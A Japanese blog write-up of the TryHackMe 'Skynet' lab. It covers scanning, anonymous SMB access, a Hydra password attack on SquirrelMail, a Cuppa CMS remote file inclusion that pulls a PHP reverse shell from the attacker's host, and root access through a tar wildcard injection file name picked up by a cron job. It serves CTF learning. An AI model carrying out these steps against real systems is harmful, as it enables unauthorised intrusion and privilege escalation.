【TryHackMe write-up】Skynet

May 06, 2020

はじめに

TryHackMe の Skynet という machine をやっていきます。

cheat sheet

以下で cheat sheet としてツールの使い方などをまとめています。参考にしてください。 github | sanposhiho/MYCHEATSHEET

nmap

kali@kali:~$ nmap -sC -sV 10.10.130.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-05 22:58 EDT
Nmap scan report for 10.10.130.51
Host is up (0.26s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL TOP RESP-CODES UIDL AUTH-RESP-CODE PIPELINING CAPA
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ ID ENABLE post-login IMAP4rev1 have more listed LOGIN-REFERRALS capabilities LOGINDISABLEDA0001 OK SASL-IR Pre-login
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2020-05-05T21:59:32-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-05-06T02:59:33
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.89 seconds

gobuster

kali@kali:~$ gobuster dir -u http://10.10.130.51 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.130.51
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/05 23:15:58 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
[ERROR] 2020/05/05 23:23:01 [!] Get http://10.10.130.51/opiskelu: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/05 23:25:44 [!] Get http://10.10.130.51/5949: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/05 23:25:44 [!] Get http://10.10.130.51/_templates: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/server-status (Status: 403)
===============================================================
2020/05/05 23:40:54 Finished
===============================================================

一部エラー出てますけどこんな感じでした。

/squirrelmail は以下のページにリダイレクトされます。

スクリーンショット 2020-05-06 17.07.42.png

nmap script で smb を調べる

kali@kali:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.237.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 03:18 EDT
Nmap scan report for 10.10.237.52
Host is up (0.26s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.237.52\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (skynet server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.237.52\anonymous:
|     Type: STYPE_DISKTREE
|     Comment: Skynet Anonymous Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\srv\samba
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.237.52\milesdyson:
|     Type: STYPE_DISKTREE
|     Comment: Miles Dyson Personal Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\milesdyson\share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.237.52\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 55.98 seconds
kali@kali:~$ nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.237.52
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 03:20 EDT
Nmap scan report for 10.10.237.52
Host is up (0.27s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.237.52\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (skynet server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.237.52\anonymous:
|     Type: STYPE_DISKTREE
|     Comment: Skynet Anonymous Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\srv\samba
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.237.52\milesdyson:
|     Type: STYPE_DISKTREE
|     Comment: Miles Dyson Personal Share
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\milesdyson\share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.237.52\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 57.33 seconds

smbmap

公式の writeup をみてみると smbmap というのを使ってた 内容的には nmap script と変わらなそう

kali@kali:~$ smbmap -H 10.10.237.52
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.237.52...
[+] IP: 10.10.237.52:445        Name: 10.10.237.52
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        .
        dr--r--r--                0 Wed Sep 18 00:41:20 2019    .
        dr--r--r--                0 Tue Sep 17 03:20:17 2019    ..
        fr--r--r--              163 Tue Sep 17 23:04:59 2019    attention.txt
        dr--r--r--                0 Wed Sep 18 00:42:16 2019    logs
        dr--r--r--                0 Wed Sep 18 00:40:06 2019    books
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

smbclient

anonymous でアクセスします。

kali@kali:~$ smbclient //10.10.237.52/anonymous
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 18 00:41:20 2019
  ..                                  D        0  Tue Sep 17 03:20:17 2019
  attention.txt                       N      163  Tue Sep 17 23:04:59 2019
  logs                                D        0  Wed Sep 18 00:42:16 2019
  books                               D        0  Wed Sep 18 00:40:06 2019

                9204224 blocks of size 1024. 5373956 blocks available
smb: \> cat attention.txt
cat: command not found
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> ls
  .                                   D        0  Wed Sep 18 00:42:16 2019
  ..                                  D        0  Wed Sep 18 00:41:20 2019
  log2.txt                            N        0  Wed Sep 18 00:42:13 2019
  log1.txt                            N      471  Wed Sep 18 00:41:59 2019
  log3.txt                            N        0  Wed Sep 18 00:42:16 2019

                9204224 blocks of size 1024. 5373956 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.4 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \logs\> exit

2 つのファイルをゲットしました。

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator

hydra で password を当てる

milesdyson のパスワードを log1.txt から探します。

kali@kali:~$ hydra -l milesdyson -P log1.txt 10.10.35.53 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-06 04:37:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.35.53:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.35.53   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-06 04:38:05

これを使って squirrelmail にログインします。

スクリーンショット 2020-05-06 17.40.34.png スクリーンショット 2020-05-06 17.40.52.png

samba に再度アクセス

)s{A&2Z=F^n_E.B`を使って smb にアクセスします。

kali@kali:~$ smbclient //10.10.35.53/milesdyson --user=milesdyson
directory_create_or_exist: mkdir failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Sep 17 05:05:47 2019
  ..                                  D        0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 05:05:14 2019
  notes                               D        0  Tue Sep 17 05:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 05:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 05:05:14 2019

                9204224 blocks of size 1024. 5373796 blocks available
smb: \> cd notes
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 05:18:40 2019
  ..                                  D        0  Tue Sep 17 05:05:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 05:01:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 05:01:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 05:01:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 05:01:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 05:01:29 2019
  important.txt                       N      117  Tue Sep 17 05:18:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 05:01:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 05:01:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 05:01:29 2019
  3.02 Planning.md                    N    71657  Tue Sep 17 05:01:29 2019
  1.04 Probability.md                 N    62712  Tue Sep 17 05:01:29 2019
  2.06 Natural Language Processing.md      N    82633  Tue Sep 17 05:01:29 2019
  2.00 Machine Learning.md            N       26  Tue Sep 17 05:01:29 2019
  1.03 Calculus.md                    N    40779  Tue Sep 17 05:01:29 2019
  3.03 Reinforcement Learning.md      N    25119  Tue Sep 17 05:01:29 2019
  1.08 Probabilistic Graphical Models.md      N    81655  Tue Sep 17 05:01:29 2019
  1.06 Bayesian Statistics.md         N    39554  Tue Sep 17 05:01:29 2019
  6.00 Appendices.md                  N       20  Tue Sep 17 05:01:29 2019
  1.01 Functions.md                   N     7627  Tue Sep 17 05:01:29 2019
  2.03 Neural Nets.md                 N   144726  Tue Sep 17 05:01:29 2019
  2.04 Model Selection.md             N    33383  Tue Sep 17 05:01:29 2019
  2.02 Supervised Learning.md         N    94287  Tue Sep 17 05:01:29 2019
  4.00 Simulation.md                  N       20  Tue Sep 17 05:01:29 2019
  3.05 In Practice.md                 N     1123  Tue Sep 17 05:01:29 2019
  1.07 Graphs.md                      N     5110  Tue Sep 17 05:01:29 2019
  2.07 Unsupervised Learning.md       N    21579  Tue Sep 17 05:01:29 2019
  2.05 Bayesian Learning.md           N    39443  Tue Sep 17 05:01:29 2019
  5.03 Anonymization.md               N     2516  Tue Sep 17 05:01:29 2019
  5.01 Process.md                     N     5788  Tue Sep 17 05:01:29 2019
  1.09 Optimization.md                N    25823  Tue Sep 17 05:01:29 2019
  1.05 Statistics.md                  N    64291  Tue Sep 17 05:01:29 2019
  5.02 Visualization.md               N      940  Tue Sep 17 05:01:29 2019
  5.00 In Practice.md                 N       21  Tue Sep 17 05:01:29 2019
  4.02 Nonlinear Dynamics.md          N    44601  Tue Sep 17 05:01:29 2019
  1.10 Algorithms.md                  N    28790  Tue Sep 17 05:01:29 2019
  3.04 Filtering.md                   N    13360  Tue Sep 17 05:01:29 2019
  1.00 Foundations.md                 N       22  Tue Sep 17 05:01:29 2019

                9204224 blocks of size 1024. 5373796 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\> exit

important.txtという明らかに重要そうなやつをみてみます。

kali@kali:~$ cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

/45kra24zxs28v3yd にブラウザでアクセスしてみます。

スクリーンショット 2020-05-06 18.02.27.png

再度 gobuster

kali@kali:~$ gobuster dir -u http://10.10.35.53/45kra24zxs28v3yd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.35.53/45kra24zxs28v3yd
[+] Threads:        40
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/06 05:09:45 Starting gobuster
===============================================================
/administrator (Status: 301)
[ERROR] 2020/05/06 05:18:39 [!] Get http://10.10.35.53/45kra24zxs28v3yd/sub-top: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/05/06 05:34:42 [!] Get http://10.10.35.53/45kra24zxs28v3yd/t1039: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/05/06 05:35:02 Finished
===============================================================

スクリーンショット 2020-05-06 18.11.08.png

searchsploit

kali@kali:~$ searchsploit cuppa
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                        |  Path
                                                                                                                                      | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                                       | exploits/php/webapps/25971.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
kali@kali:~$ searchsploit -p 25971
  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
File Type: ASCII text, with very long lines, with CRLF line terminators

Copied EDB-ID #25971's path to the clipboard.

この exploit を使用してみます。 https://www.exploit-db.com/exploits/25971

リバースシェルとる

以下の php ファイルを https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

例のごとく python -m SimpleHTTPServer でホスティングし、http://10.10.30.62/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=http://10.9.27.249:8000/exploit.phpにアクセスし、Remote File Inclusion で実行します。

待ち構えておくとリバースシェルの取得に成功します。

kali@kali:~$ nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.9.27.249] from (UNKNOWN) [10.10.35.53] 59582
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 05:15:53 up  2:18,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skynet:/$

privilege escalation

pspy64 でみてみると

www-data@skynet:/tmp$ wget http://10.9.27.249:8000/pspy64
--2020-05-06 05:31:37--  http://10.9.27.249:8000/pspy64
Connecting to 10.9.27.249:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'

pspy64              100%[===================>]   2.94M   711KB/s    in 8.9s

2020-05-06 05:31:47 (340 KB/s) - 'pspy64' saved [3078592/3078592]

www-data@skynet:/tmp$ chmod +x pspy64
www-data@skynet:/tmp$ ./pspy64

2020/05/06 05:32:31 CMD: UID=0    PID=1043   | /usr/sbin/acpid
2020/05/06 05:32:31 CMD: UID=0    PID=1038   | /usr/sbin/atd -f
2020/05/06 05:32:31 CMD: UID=0    PID=1024   | /lib/systemd/systemd-logind
2020/05/06 05:32:31 CMD: UID=0    PID=1019   | /usr/sbin/cron -f
2020/05/06 05:32:31 CMD: UID=104  PID=1007   | /usr/sbin/rsyslogd -n
2020/05/06 05:32:31 CMD: UID=0    PID=10     |
2020/05/06 05:32:31 CMD: UID=0    PID=1      | /sbin/init
2020/05/06 05:33:01 CMD: UID=0    PID=3431   | /bin/bash /home/milesdyson/backups/backup.sh
2020/05/06 05:33:01 CMD: UID=0    PID=3430   | /bin/sh -c /home/milesdyson/backups/backup.sh
2020/05/06 05:33:01 CMD: UID=0    PID=3429   | /usr/sbin/CRON -f
2020/05/06 05:33:01 CMD: UID=0    PID=3432   | tar cf /home/milesdyson/backups/backup.tgz 45kra24zxs28v3yd admin ai config css image.png index.html js style.css

/bin/sh -c /home/milesdyson/backups/backup.shが定期的に実行されてます。

www-data@skynet:/tmp$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/1 *   * * *   root    /home/milesdyson/backups/backup.sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

crontab に書かれてますね 内容はこんな感じです。

www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

ここで着目すべきは *(ワイルドカード) です 以下の記事で詳しく説明がなされています。 Exploiting wildcards on Linux

要約すると –-checkpoint=1–-checkpoint-action=exec=sh shell.sh などの名前のファイルを作成しておくと、特定のコマンドでのワイルドカードの使用時にオプションとして理解されてしまう というものです。

これを利用して、shell.shを以下の内容で作成し、

chmod 777 /root

–-checkpoint-action=exec=sh shell.shも作成します。

$ ls

45kra24zxs28v3yd
admin
ai
config
css
image.png
index.html
js
shell.sh
style.css
–checkpoint-action=exec=sh shell.sh

あとは cronjob が実行されるのを待っていると

$ ls -la /
total 96
drwxr-xr-x  23 root root  4096 Sep 18  2019 .
drwxr-xr-x  23 root root  4096 Sep 18  2019 ..
drwxr-xr-x   2 root root  4096 Sep 17  2019 bin
drwxr-xr-x   3 root root  4096 Sep 17  2019 boot
drwxr-xr-x  17 root root  3640 May  6 05:59 dev
drwxr-xr-x 102 root root  4096 Sep 20  2019 etc
drwxr-xr-x   3 root root  4096 Sep 17  2019 home
lrwxrwxrwx   1 root root    32 Sep 17  2019 initrd.img -> boot/initrd.img-4.8.0-58-generic
lrwxrwxrwx   1 root root    33 Sep 17  2019 initrd.img.old -> boot/initrd.img-4.4.0-161-generic
drwxr-xr-x  22 root root  4096 Sep 17  2019 lib
drwxr-xr-x   2 root root  4096 Sep 17  2019 lib64
drwx------   2 root root 16384 Sep 17  2019 lost+found
drwxr-xr-x   3 root root  4096 Sep 17  2019 media
drwxr-xr-x   2 root root  4096 Feb 26  2019 mnt
drwxr-xr-x   2 root root  4096 Feb 26  2019 opt
dr-xr-xr-x 149 root root     0 May  6 05:59 proc
drwxrwxrwx   4 root root  4096 Sep 17  2019 root
drwxr-xr-x  26 root root   920 May  6 06:25 run
drwxr-xr-x   2 root root 12288 Sep 17  2019 sbin
drwxr-xr-x   2 root root  4096 Sep 17  2019 snap
drwxr-xr-x   3 root root  4096 Sep 17  2019 srv
dr-xr-xr-x  13 root root     0 May  6 06:25 sys
drwxrwxrwt   9 root root  4096 May  6 06:43 tmp
drwxr-xr-x  10 root root  4096 Sep 17  2019 usr
drwxr-xr-x  14 root root  4096 Sep 17  2019 var
lrwxrwxrwx   1 root root    29 Sep 17  2019 vmlinuz -> boot/vmlinuz-4.8.0-58-generic
lrwxrwxrwx   1 root root    30 Sep 17  2019 vmlinuz.old -> boot/vmlinuz-4.4.0-161-generic

/root にアクセス可能になります。

終わりに

最後のワイルドカードの部分はわからなさすぎて writeup カンニングしちゃいました。。

このエントリーをはてなブックマークに追加